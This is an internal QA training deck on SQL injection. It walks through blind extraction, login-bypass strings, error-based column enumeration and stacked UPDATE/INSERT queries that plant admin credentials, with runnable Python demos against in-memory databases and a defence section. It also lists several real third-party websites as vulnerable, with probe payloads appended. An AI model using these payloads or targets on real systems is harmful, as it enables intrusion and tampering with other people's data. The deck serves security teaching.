
SQL Injections

Core QA Team, 5th March 2008

© Copyright Kenexa® 2004

Agenda

• What is SQL Injection
• SQL Injection possibilities
• Technologies affected by SQL Injections
• Types of SQL Injections
• Techniques in SQL Injections
• How to use Blind SQL Injections
• How to use SQL Injections
• How to use Advanced SQL Injections
• How to update data in the database
• How to avoid SQL Injections
• Next generation of Hacking
• Tools for SQL Injections


What is SQL Injection

• SQL Injection is one of the many web attack mechanisms used by attackers to steal data from organizations, and is perhaps the most common application-layer attack technique in use today. It takes advantage of improper coding in a web application that lets an attacker inject SQL commands into, say, a login form and so gain access to the data held in the database behind it.

• In essence, SQL Injection arises because fields intended for user input are allowed to carry SQL statements through to the database, which then executes them as part of the application's own query.


SQL Injection possibilities

• Using SQL injections, attackers can:
  – Add new data to the database
    • Could be embarrassing to find yourself selling politically incorrect items on an eCommerce site
    • Perform an INSERT in the injected SQL
  – Modify data currently in the database
    • Could be very costly to have an expensive item suddenly be deeply 'discounted'
    • Perform an UPDATE in the injected SQL
  – Often gain access to other users' system capabilities by obtaining their passwords


Technologies affected by SQL Injections

• JSP
• ASP
• XML, XSL
• JavaScript
• VB, MFC and other ODBC-based tools
• APIs
• 3- and 4GL-based languages such as C, OCI, Pro*C, and COBOL
• Perl
• CGI scripts that access Oracle databases
• many more


Types of SQL Injections

• Blind SQL injections
• SQL injections
• Advanced SQL injections


Techniques in SQL Injections

• Authorization bypass
• Using the SELECT command
• Using the INSERT command
• Using SQL Server stored procedures


How to use Blind SQL injection

Step 1 - Many companies allow Internet access to archives of their press releases. A URL for accessing the company's fifth press release might look like this:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5

Step 2 - Append a condition that is always true and request this URL:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND 1=1
If the application still returns the same press release, the parameter is being placed into the query unchanged and the application is susceptible to SQL injection. As a check, request the same URL with AND 1=2: it should now return nothing. If both requests produce the same page, the true/false difference is not observable and this technique will not work against that parameter.

Step 3 - We can use this behaviour to "ask" the database server true/false questions. For instance, the following request essentially asks the database server, "Is the current user dbo?"
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND USER_NAME() = 'dbo'


USER_NAME() is a SQL Server function that returns the name of the current database user. If the current user is dbo (the database owner, an administrative account), the whole WHERE clause is true and the fifth press release is returned. If not, the clause is false, no row matches, and no press release is displayed.

Step 4 - By combining sub-queries and functions, we can ask more complex questions. The following example attempts to retrieve the name of a database table, one character at a time:

http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109

Step 5 - If the server returns the fifth press release in response to this URL, we know that the first letter of the query's result comes after the letter "m" (ASCII 109) in the alphabet. By making multiple requests, we can determine the precise ASCII value.


http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116

Step 6 - If no press release is returned this time, the ASCII value is greater than 109 but not greater than 116, so the letter lies between "n" (110) and "t" (116). The next request splits that range again:

http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 113

Halving the range on every request pins each character down in about seven requests. The second character is then read the same way with substring(..., 2, 1), and so on until the whole table name is known.
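A runnable version of steps 1 to 6, added here as an example; it is not code from the original slides. It stands in for pressRelease.jsp and SQL Server with a small SQLite database built in memory from constructed sample data (one press release with ID 5 and an empty users table), so the SQL Server-specific pieces are respelled for SQLite: sysobjects WHERE xtype='U' becomes sqlite_master WHERE type='table', and substring/ascii become substr/unicode. The function and table names are the example's own. It generalises the "> 109", "> 116", "> 113" probes into a binary search that reads the whole first table name.

```python
import sqlite3

# Constructed sample data standing in for the company's press-release database.
def build_press_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE press_releases (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO press_releases VALUES (5, 'Fifth press release');
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
    """)
    return conn


def vulnerable_press_release(conn, press_release_id):
    """Stand-in for pressRelease.jsp. Deliberately vulnerable: the
    pressReleaseID parameter is concatenated into the SQL unchanged."""
    sql = "SELECT title FROM press_releases WHERE id = " + press_release_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None          # a broken query shows no press release either
    return row[0] if row else None


def ask(conn, condition):
    """The true/false oracle of step 3: does '5 AND <condition>' still
    return the fifth press release?"""
    return vulnerable_press_release(conn, "5 AND " + condition) is not None


# SQLite spelling of the slides' (SELECT TOP 1 name FROM sysobjects WHERE xtype='U')
FIRST_TABLE = ("(SELECT name FROM sqlite_master WHERE type='table' "
               "ORDER BY name LIMIT 1)")


def extract_first_table_name(conn, max_len=64):
    """Steps 4 to 6 generalised: for each position, binary-search the
    character's code point with the same '> N' probe the slides use."""
    name = ""
    for pos in range(1, max_len + 1):
        if not ask(conn, "length(%s) >= %d" % (FIRST_TABLE, pos)):
            break                     # ran off the end of the name
        lo, hi = 0, 127               # invariant: code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "unicode(lower(substr(%s, %d, 1))) > %d" % (FIRST_TABLE, pos, mid)
            if ask(conn, probe):
                lo = mid + 1          # press release shown: code point > mid
            else:
                hi = mid              # nothing shown: code point <= mid
        name += chr(lo)
    return name


if __name__ == "__main__":
    db = build_press_db()
    print("AND 1=1 ->", ask(db, "1=1"), "  AND 1=2 ->", ask(db, "1=2"))
    print("first user table:", extract_first_table_name(db))
```

Each call to ask() is one HTTP request in the real attack; the binary search needs about seven per character plus one length check, which is why blind extraction is slow but entirely practical.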


URLs vulnerable to blind SQL injection attack (examples collected for this talk)

http://www.bharatstudent.com/cafebharat/cafebharat.php?cat=2%20and%201=1

http://content-ind.cricinfo.com/wivzimsa/engine/current/match/298809.html%20and%201=1

http://www.minglebox.com/user.do?method=registerUser&error=true%20and%20USERINFO_NAME="raj"


How to use SQL injections

• Here is a sample basic HTML form with two inputs, login and password.

<form method="post" action="http://testasp.acunetix.com/login.asp">
  <input name="tfUName" type="text" id="tfUName">
  <input name="tfUPass" type="password" id="tfUPass">
</form>

• The easiest way for login.asp to work is by building a database query that looks like this:

SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password'


• If the variables $username and $password are taken directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x

The query then becomes:

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'


• Because the inputs of the web application are not properly sanitised, the single quotes have turned the WHERE clause into a two-part condition.

• The 'x'='x' part is guaranteed to be true regardless of what the first part contains, and since AND binds tighter than OR the clause is evaluated as (username = 'Joe' AND password = 'anything') OR 'x'='x', which is true for every row.

• This allows the attacker to bypass the login form without knowing a valid username / password combination. Which account the attacker ends up in depends on which row the application takes, typically the first row of the table.

• Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
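The login bypass above, as an added example that is not part of the original slides: a SQLite stand-in for login.asp (constructed sample data, one user "Joe" with password "s3cret"), with the vulnerable string-built query beside the same query using bound parameters. Each of the slides' candidate payloads is sent in the password field against both; the function names and the sample user are the example's own. The results also show why the slides say you may have to try several payloads: only the ones whose quoting matches this particular query work, and one of them breaks the query's syntax.

```python
import sqlite3

# Constructed sample data standing in for login.asp's logins table.
def build_login_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO logins VALUES (1, 'Joe', 's3cret');
    """)
    return conn


def vulnerable_login(conn, username, password):
    """Builds the slides' query by string concatenation (deliberately
    vulnerable). Returns the matched id, or None for no match / bad SQL."""
    sql = ("SELECT id FROM logins WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None       # payload did not fit this query's syntax
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same query with bound parameters: the input reaches the database
    as data, so quotes and comment markers have no SQL meaning."""
    row = conn.execute(
        "SELECT id FROM logins WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The slides' candidate payloads, here sent in the password field.
PAYLOADS = [
    "anything' OR 'x'='x",
    "' or 1=1--",
    '" or 1=1--',
    "or 1=1--",
    "' or 'a'='a",
    '" or "a"="a',
    "') or ('a'='a",
]


def try_payloads(conn, login, username="nobody"):
    """Map each payload to what the given login function returns for it,
    using a username that does not exist in the table."""
    return {p: login(conn, username, p) for p in PAYLOADS}


if __name__ == "__main__":
    db = build_login_db()
    for payload, result in try_payloads(db, vulnerable_login).items():
        print("vulnerable    %-22r -> %r" % (payload, result))
    for payload, result in try_payloads(db, safe_login).items():
        print("parameterised %-22r -> %r" % (payload, result))
```

With the vulnerable function the single-quote payloads log in as id 1 (Joe) even though the username "nobody" does not exist; the double-quote variants are just wrong passwords here because this query delimits strings with single quotes, and ') or ('a'='a leaves an unbalanced parenthesis and fails. With bound parameters every payload is a wrong password and only the real credentials return an id.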


URLs vulnerable to SQL injection attack (examples collected for this talk)

http://www.osmania.ac.in/ou/res07/20080126.jsp

http://www.powerscrap.com/frame.aspx?Login=true


How to use Advanced SQL injections

• The attacker could log in as the first user in the 'users' table with the following input:

Username: ' or 1=1--

• Next the attacker wants to establish the names of the tables that the query operates on, and the names of their fields. To do this, the attacker uses the 'having' clause of the 'select' statement:

Username: ' having 1=1--

• SQL Server rejects this because the selected columns are not in an aggregate function or a GROUP BY clause, and its error message names the first column in the select list (users.id). So the attacker now knows the table name and the column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:

Username: ' group by users.id having 1=1--


• … which produces the error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35

• Each error reveals the next column. Eventually the attacker arrives at the following 'username':

' group by users.id, users.username, users.password, users.privs having 1=1--

• … which produces no error, and is functionally equivalent to: select * from users where username = ''

• It would also be useful to determine the type of each column. This can be achieved with a 'type conversion' error message, for example:

Username: ' union select sum(username) from users--

SQL Server's reply ("The sum or average aggregate operation cannot take a varchar data type as an argument") names the column's type.


How to update data in the database

• Once we have gathered all the column names of a table, we can UPDATE or even INSERT records in it. For example, to change the password for "neo":

http://duck/index.asp?id=10; UPDATE admin_login SET password = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666,'neo2','newpas5','NA')--

We can now log in as "neo2" with the password "newpas5". Both requests rely on the database driver accepting several ';'-separated statements in one call (a "stacked" or "batched" query), which SQL Server's client libraries do; the trailing -- comments out whatever SQL the application appends after the id.


How to avoid SQL Injections

• Build every query with bind parameters (parameterised queries / prepared statements) so that user input reaches the database as data and never as part of the SQL text. This is the primary defence; the filtering below is a second layer, not a substitute for it.

• Filter out characters such as single quote, double quote, slash, backslash and semicolon, and special characters such as NUL, carriage return and new line, in all strings that come from:
  - input from users
  - parameters from the URL
  - values from cookies

• For a numeric value, convert it to an integer before placing it in the SQL statement. ISNUMERIC is not a safe substitute: it also accepts values such as '1e3' or '$' that are not integers.

• Run SQL Server under a low-privilege account: change "Startup and run SQL Server" in the SQL Server Security tab.

• Disable or remove stored procedures that you are not using, such as:
  master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
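The two numeric-parameter defences from this slide side by side, as an added example that is not part of the original slides: the character filter the slide describes, and integer conversion before the value is used. It runs against a SQLite stand-in for pressRelease.jsp (constructed sample data, one press release with ID 5; the function names are the example's own). A numeric context needs no quotes, semicolons or slashes to inject, so the filter leaves the blind-injection probes from earlier in the talk untouched, while the converted-and-bound version rejects anything that is not an integer.

```python
import sqlite3

# The character filter the slide describes: quotes, slashes, semicolon, NUL, CR, LF.
DANGEROUS = "'\"/\\;\x00\r\n"


def strip_dangerous_chars(value):
    """Remove the slide's list of dangerous characters from a string."""
    return "".join(ch for ch in value if ch not in DANGEROUS)


# Constructed sample data standing in for the press-release database.
def build_press_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE press_releases (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO press_releases VALUES (5, 'Fifth press release');
    """)
    return conn


def lookup_filtered(conn, press_release_id):
    """Filter-only defence: the value is still concatenated, and a numeric
    context does not need any of the filtered characters to inject."""
    sql = ("SELECT title FROM press_releases WHERE id = "
           + strip_dangerous_chars(press_release_id))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def lookup_typed(conn, press_release_id):
    """The slide's advice for numbers: convert to an integer first, then
    use it. Anything that is not an integer is rejected before any SQL runs.
    The int is bound as a parameter here; once it is an int, even
    formatting it into the string would be safe."""
    try:
        pid = int(press_release_id.strip(), 10)
    except ValueError:
        return None
    row = conn.execute("SELECT title FROM press_releases WHERE id = ?",
                       (pid,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_press_db()
    for value in ("5", "5 AND 1=1", "5 AND 1=2", "1e3"):
        print("%-12r filtered: %-22r typed: %r"
              % (value, lookup_filtered(db, value), lookup_typed(db, value)))
```

The filtered lookup answers "5 AND 1=1" and "5 AND 1=2" differently, so it still serves as the true/false oracle that blind injection needs; the typed lookup answers both with nothing.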


Next generation of Hacking

• Ethical Hacking
• Server side scripting
• Client side scripting
• Bluetooth Hacking
• Console Hacking


Tools for SQL Injection

• SQID - SQL Injection Digger
• SQLBrute - SQL Injection Brute Force Tool
• N-Stalker Web Application Security Scanner 2006
• Acunetix Web Vulnerability Scanner
• HP WebInspect
• Wikto: Web Server Assessment Tool


www.kenexa.com